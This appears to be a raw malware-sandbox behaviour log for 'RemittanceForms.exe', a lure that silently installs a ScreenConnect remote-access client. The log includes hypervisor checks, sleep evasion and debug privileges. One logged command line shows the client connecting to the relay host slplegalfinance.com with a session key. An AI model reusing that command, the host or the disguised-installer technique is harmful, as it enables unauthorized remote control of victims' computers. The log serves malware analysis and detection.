                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: E50000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: 2F40000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: 2DB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: 65E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: 5DD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: 75E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: 85E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: 65E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: 8860000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: 9860000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: DA0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 1450000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 13A0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: ED0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: 1AB60000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 1A60000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 3310000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 1AE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 69F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 61E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 79F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 89F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 69F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 8C70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeMemory allocated: 9C70000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Downloads\RemittanceForms.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE165.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Windows.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Users\user\Downloads\RemittanceForms.exe TID: 4132Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7084Thread sleep time: -30000s >= -30000s
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 3424Thread sleep count: 61 > 30
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 3288Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exe TID: 5552Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 6652Thread sleep time: -34000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Downloads\RemittanceForms.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
                      Source: C:\Users\user\Downloads\RemittanceForms.exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess token adjusted: Debug
                      Source: C:\Users\user\Downloads\RemittanceForms.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Downloads\RemittanceForms.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" "?e=access&y=guest&h=slplegalfinance.com&p=443&s=0dff7030-637d-4802-a9cf-5f63d3c8abe9&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv&t=newbuild"
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
                      Source: C:\Users\user\Downloads\RemittanceForms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI8F57.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI8F57.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI8F57.tmp-\ScreenConnect.Core.dll VolumeInformation
